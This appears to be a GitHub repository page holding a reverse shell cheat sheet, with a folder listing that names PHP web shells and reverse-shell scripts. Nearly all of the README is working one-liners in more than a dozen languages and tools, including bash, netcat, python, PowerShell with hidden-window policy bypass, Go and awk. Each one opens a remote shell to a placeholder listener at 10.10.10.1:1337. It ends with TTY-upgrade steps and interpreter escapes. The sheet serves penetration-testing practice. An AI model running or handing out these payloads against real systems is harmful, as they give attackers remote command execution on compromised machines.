Skip to content

Latest commit

 

History

History
 
 

shell

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 
b374k.php
b374k.php
 
 
p0wny.php
p0wny.php
 
 
phprev.php
phprev.php
 
 
pyrev.py
pyrev.py
 
 
tinyshell.md
tinyshell.md
 
 

README.md

Reverse shell Cheat Sheet

Replace the ip with your own ip and port with your own port.

  1. bash:

Shell 1 (tcp): bash -i >& /dev/tcp/10.10.10.1/1337 0>&1

Shell 2 (tcp): 0<&196;exec 196<>/dev/tcp/10.10.10.1/1337; sh <&196 >&196 2>&196

Shell 3 (udp): sh -i >& /dev/udp/10.10.10.1/1337 0>&1 listen with nc -u -lvp 1337

  1. python:

Shell: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

File: pyrev.py

  1. php:

Shell: php -r '$sock=fsockopen("10.10.10.1",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

File: phprev.php

  1. perl:

Shell 1: perl -e 'use Socket;$i="10.10.10.1";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Shell 2 (windows): perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.1:1337");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Shell 3 (windows): perl -e 'use Socket;$i="10.10.10.1";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

  1. netcat:

Shell 1 : nc -e /bin/sh 10.10.10.1 1337

Shell 2: /bin/sh | nc 10.10.10.1 1337

Shell 3: rm -f /tmp/z; mknod /tmp/z z && nc 10.10.10.1 1337 0/tmp/z

  1. telnet:

Shell 1: rm -f /tmp/z; mknod /tmp/z z && telnet 10.10.10.1 1337 0/tmp/z

Shell 2: telnet 10.10.10.1 80 | /bin/bash | telnet 10.10.10.1 443 (listen on 443)

  1. ruby:

Shell: ruby -rsocket -e'f=TCPSocket.open("10.10.10.1",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

  1. java:

Shell:

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.1/1337;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

p.waitFor()
  1. xterm:

Shell: xterm -display 10.10.10.1:1337

  1. socat:

Shell: /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.1:1337 listen with socat file:'tty',raw,echo=0 TCP-L:1337

  1. powershell:

Shell 1: powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.10.1",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Shell 2: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.1',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

  1. Golang:

Shell: echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.10.10.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

  1. awk:

Shell: awk 'BEGIN {s = "/inet/tcp/0/10.10.10.1/1337"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

  1. lua:

Shell 1: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.10.10.1','1337');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Shell 2 (windows): lua5.1 -e 'local host, port = "10.10.10.1", 1337 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

Spawn TTY:

ctrl+z

echo $TERM && tput lines && tput cols

stty raw -echo

fg

reset

export SHELL=bash

export TERM=xterm-256color

stty rows <num> columns <cols>

Spawn a TTY shell from an interpreter:

/bin/sh -i
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c "__import__('pty').spawn('/bin/bash')"
python3 -c "__import__('subprocess').call(['/bin/bash'])"
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
perl -e 'print `/bin/bash`'
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
vi: :!bash
vi: :set shell=/bin/bash:shell
nmap: !sh
mysql: ! bash